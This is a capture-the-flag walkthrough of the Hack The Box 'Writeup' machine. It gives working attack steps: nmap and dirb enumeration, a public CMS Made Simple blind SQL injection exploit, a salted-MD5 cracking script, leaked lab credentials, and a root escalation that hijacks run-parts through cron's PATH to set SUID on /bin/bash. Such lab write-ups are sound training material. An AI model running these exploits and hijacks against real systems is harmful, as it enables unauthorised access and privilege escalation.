Release: 06-08-2019

First of all, we need to enumerate and scan the open ports. Follow the steps below:

  1. Make new dirs for the full and the detailed port scan output files. It's good practice to keep the files as organized as possible.
  2. Now, run a shallow nmap scan (the default top 1000 TCP ports), just to list the open ports.
  3. Move the output files to the "nmap_full" dir.
  4. With the results of that scan, rescan the specific open ports with a deeper scan (-sV) to enumerate the services and their versions.
  5. Move the output files to the "nmap_ports" dir.
TIP: If the listed open ports don't give any lead towards an exploit/vulnerability/payload, run a deeper scan with the -p- option (all 65535 TCP ports); there may be high ports open that the default scan doesn't cover: # nmap -sV -p- -v -oA nmap <target-ip>

Check the commands used for the initial enumeration:


kali@kali: ~/htb/writeup/ # mkdir nmap_full nmap_ports
kali@kali: ~/htb/writeup/ # nmap -Pn -n -v -oA nmap <target-ip>
kali@kali: ~/htb/writeup/ # mv nmap.* ./nmap_full/
kali@kali: ~/htb/writeup/ # nmap -sV -p22,80 -v -oA nmap <target-ip>
kali@kali: ~/htb/writeup/ # mv nmap.* ./nmap_ports/
kali@kali: ~/htb/writeup/ # cat ./nmap_ports/nmap.nmap
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
80/tcp open http Apache httpd 2.4.25 ((Debian))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
kali@kali: ~/htb/writeup/ #
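The two-phase scan above as one script. This is an added example, not the author's commands: phase one runs the default top-1000 scan straight into nmap_full/, phase two parses the open ports out of the grepable .gnmap file and version-scans only those into nmap_ports/, and the -p- fallback from the TIP is suggested when phase one finds nothing. The target address, the sample .gnmap line in the comments and the output base names are assumptions; nmap -oA <base> does write <base>.nmap, <base>.gnmap and <base>.xml.

```shell
#!/bin/sh
# Added example: two-phase nmap workflow (quick scan, then -sV on the open ports only).
# Not the original writeup's script; the target is whatever you pass as $1.
# We parse the grepable .gnmap output. A host line in it looks like (constructed sample):
#   Host: 192.0.2.10 ()<TAB>Ports: 22/open/tcp//ssh///, 80/open/tcp//http///<TAB>Ignored State: closed (998)

# Print the open TCP ports from a .gnmap file as a comma list ("22,80"), or nothing.
# Only definite "open" TCP entries are taken; "open|filtered" (UDP) and closed ones are not.
open_ports() {
    grep -E '^Host: .*Ports: ' "$1" \
      | grep -oE '[0-9]+/open/tcp' \
      | cut -d/ -f1 \
      | sort -un \
      | paste -sd, -
}

# Phase 1 into nmap_full/, phase 2 into nmap_ports/ (no mv needed afterwards).
scan() {
    target="$1"
    mkdir -p nmap_full nmap_ports
    nmap -Pn -n -v -oA nmap_full/nmap "$target"
    ports=$(open_ports nmap_full/nmap.gnmap)
    if [ -z "$ports" ]; then
        echo "No open TCP ports in the top 1000. Try all ports:" >&2
        echo "  nmap -Pn -n -sV -p- -v -oA nmap_full/nmap_all $target" >&2
        return 1
    fi
    echo "Open ports: $ports; running the version scan" >&2
    nmap -Pn -n -sV -p"$ports" -v -oA nmap_ports/nmap "$target"
}

# Usage: ./scan.sh <target-ip>
if [ $# -gt 0 ]; then
    scan "$1"
fi
```

The -Pn/-n flags are kept from the transcript above: no ping probe (HTB hosts often drop ICMP) and no reverse DNS, so the scan only touches the target.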

As we have an open port 80, let's check what service/website is hosted on it.

  1. As with most Hack The Box machines, it's good practice to edit /etc/hosts so the target IP resolves to the writeup.htb domain: # echo "<target-ip> writeup.htb" >> /etc/hosts
  2. With the hosts entry in place, we can open the link given on the port 80 website. Let's enumerate its pages/sub-pages.
  3. There are some default files/dirs we can always enumerate on a website, but we don't have time to do it one by one, so let's dirb the host. Remember to save the output for future use: $ dirb http://writeup.htb/ /usr/share/wordlists/dirb/common.txt > dirb.txt
  4. In the dirb results there is a robots.txt in the website root: http://writeup.htb/robots.txt, with a Disallow rule for the "writeup" subdir.
  5. Now we access this subdir at http://writeup.htb/writeup/ and fingerprint it with the Wappalyzer browser extension, or from the CLI with whatweb: # whatweb http://writeup.htb/writeup/
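Steps 3 to 5 rely on reading robots.txt by hand. As an added example (not from the original writeup), the helper below pulls every Disallow path out of a robots.txt body and probes each one, so paths like /writeup/ are checked automatically instead of being copied into the browser. The host name is the page's writeup.htb; the robots.txt lines used in the comments are constructed, and the real file may differ.

```shell
#!/bin/sh
# Added example, not the author's commands: turn robots.txt Disallow rules into targets.

# Print the Disallow paths from a robots.txt body read on stdin, one per line, de-duplicated.
# Handles leading whitespace, mixed case, CRLF endings and trailing "# comments".
# A bare "Disallow:" (which means "allow everything") yields nothing.
robots_paths() {
    tr -d '\r' \
      | sed -n -E 's/^[[:space:]]*[Dd]isallow:[[:space:]]*([^#[:space:]]+).*/\1/p' \
      | sort -u
}

# Fetch robots.txt from a host and request every disallowed path, printing "<status> <url>".
# A 200 or 301/302 is worth a look; a 403 still confirms the path exists.
probe_robots() {
    host="$1"
    curl -s "http://$host/robots.txt" | robots_paths | while IFS= read -r path; do
        code=$(curl -s -o /dev/null -w '%{http_code}' "http://$host$path")
        printf '%s %s\n' "$code" "http://$host$path"
    done
}

# Usage on the box: probe_robots writeup.htb
# Constructed input for a dry run (no network):
#   printf 'User-agent: *\nDisallow: /writeup/\n' | robots_paths
```

The extracted paths are also a good seed list for a second dirb run against each discovered directory.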

We need to get shell access, so let's check some interesting points and find out how to exploit it.

  1. Wappalyzer/WhatWeb identify a "CMS Made Simple" installation. Let's search for an exploit: # searchsploit "CMS Made Simple"
  2. In the results we'll find a "CMS Made Simple" SQL injection exploit. Exploit at: https://www.exploit-db.com/exploits/46635
  3. Running the exploit: # ./exploit.py -u http://writeup.htb/writeup/ --crack --wordlist /usr/share/wordlists/rockyou.txt
  4. As the exploit's own documentation says, it is a time-based (blind) injection, so the TIME variable has to match the target's latency. Tried with 1, no results; tried with 2, no results. With TIME=3 it takes longer to resolve the password salt, but after that the user field shows the same user (jkr) as on the index page. We are on the way...
  5. The exploit finished and returned this: Salt for password found: 5a599ef579066807 | Username found: jkr | Email found: jkr@writeup.htb | Password found: 62def4866937f08cc13bab43bb14e6f7 | Password cracked: raykayjay9
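What the exploit's --crack step does, as an added example written for this page (it is not the exploit's own code): CMS Made Simple stores md5(salt . password), where the "salt" the exploit prints is the site's sitemask preference, so once the injection has leaked the salt and the hash, the rest is an offline dictionary attack. The salt and hash below are the values the exploit printed above; the wordlist path and the name of the helper are assumptions.

```shell
#!/bin/sh
# Added example: re-implement the offline crack of the leaked CMS Made Simple hash
# with coreutils, so the result can be checked independently of the exploit script.

# md5 of salt followed by the candidate password, as hex. $1 = salt, $2 = candidate.
salted_md5() {
    printf '%s%s' "$1" "$2" | md5sum | cut -d' ' -f1
}

# Try every line of a wordlist. Prints the first candidate whose salted md5 equals the
# target and returns 0; prints nothing and returns 1 if the wordlist is exhausted.
# $1 = salt, $2 = target hex hash, $3 = wordlist path
crack_md5_salted() {
    salt="$1"; target="$2"; wordlist="$3"
    while IFS= read -r word || [ -n "$word" ]; do   # "|| -n" keeps a last line without newline
        if [ "$(salted_md5 "$salt" "$word")" = "$target" ]; then
            printf '%s\n' "$word"
            return 0
        fi
    done < "$wordlist"
    return 1
}

# Values leaked by the exploit on this box (from the writeup above):
SALT=5a599ef579066807
HASH=62def4866937f08cc13bab43bb14e6f7
# Usage: crack_md5_salted "$SALT" "$HASH" /usr/share/wordlists/rockyou.txt
```

Spawning md5sum per candidate is slow on a list the size of rockyou; the same attack in hashcat is mode 20 (md5($salt.$pass)) with the input written as hash:salt, i.e. hashcat -m 20 62def4866937f08cc13bab43bb14e6f7:5a599ef579066807 /usr/share/wordlists/rockyou.txt.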

Catching the user flag:

  • Connect to host via SSH: # ssh jkr@writeup.htb
  • Type the password: raykayjay9
  • Checking the user with $ whoami
  • Checking the user UID, GID and groups: $ id
  • Listing current directory with $ ls
  • Show user.txt content with $ cat user.txt

We have access to the user shell and we already got the user flag, but we still need to gain root access to catch the root flag.

  1. For the usual enumeration, we list the directories looking for interesting files and folders that could help us gain any further access. I suggest always starting with /etc/, /usr/, /opt/ and /tmp, because there is usually useful information there; we just need to check whether the current user can read/edit it.
  2. Under /usr/local, we find dirs/subdirs (including /usr/local/bin) writable by the group "staff", which the current user (jkr) is a member of.
  3. In /etc/crontab, we find rules that call run-parts (the real binary is /bin/run-parts) by its bare name rather than by absolute path.
  4. The last important piece of enumeration is the PATH variable set at the top of /etc/crontab: /usr/local/sbin and /usr/local/bin come before /sbin and /bin, so a bare run-parts resolves to /usr/local/bin/run-parts first.

That way, we can hijack the "run-parts" lookup with a custom script at /usr/local/bin/run-parts, which root will execute instead of /bin/run-parts.
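The reasoning in steps 2 to 4 can be checked mechanically. The helper below is an added example, not part of the original writeup: given the PATH string a privileged process runs with and the bare command it invokes, it walks the directories in search order and reports every directory the current user can write to that is searched before the one holding the real binary. On the box the PATH string comes from /etc/crontab (Debian's stock line is PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin); the function name and the output format are assumptions.

```shell
#!/bin/sh
# Added example, not the author's commands: can a command that a privileged process
# calls by bare name (here "run-parts" from /etc/crontab) be hijacked through that
# process's PATH by the user we currently are?
#
# Usage: path_hijack_check "<PATH string>" <command>
# Prints "HIJACKABLE <dir>" for each writable directory searched BEFORE the real binary,
# then "REAL <dir>" for the directory that actually resolves. Exit status 0 = hijackable.
path_hijack_check() {
    cmd="$2"; rc=1
    old_ifs=$IFS; IFS=:
    set -f; set -- $1; set +f      # split the PATH string on ':' (no globbing)
    IFS=$old_ifs
    for dir; do
        if [ -x "$dir/$cmd" ]; then
            printf 'REAL %s\n' "$dir"
            break                  # the lookup stops here; later dirs are irrelevant
        elif [ -d "$dir" ] && [ -w "$dir" ]; then
            printf 'HIJACKABLE %s\n' "$dir"
            rc=0
        fi
    done
    return $rc
}

# On the box, as jkr: take the PATH line from /etc/crontab and test the command cron calls.
# cron_path=$(sed -n 's/^PATH=//p' /etc/crontab)
# path_hijack_check "$cron_path" run-parts
```

The -w test is evaluated as the current user, which is exactly the question that matters: whether jkr (via the staff group) can drop a file into a directory that root's PATH search will hit before /bin.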

Preparing a shell with root permission:

  • Write a script that sets the SUID bit on /bin/bash, so that bash runs with its owner's (root's) permissions: $ echo -e '#!/bin/bash\n\nchmod +s /bin/bash' > /usr/local/bin/run-parts; chmod +x /usr/local/bin/run-parts
  • Now open another terminal and log in again with ssh. This file runs at every login session.
  • Spawn the shell keeping the effective (root) privileges: /bin/bash -p
  • Now we have root access! When finished, remove /usr/local/bin/run-parts and run chmod -s /bin/bash, so the box is not left with a SUID shell for everyone else.

Catching the root flag!

  • Checking the user with $ whoami
  • Checking the user UID, GID and groups: $ id
  • Listing root's home directory with $ ls /root
  • Show root.txt content with $ cat /root/root.txt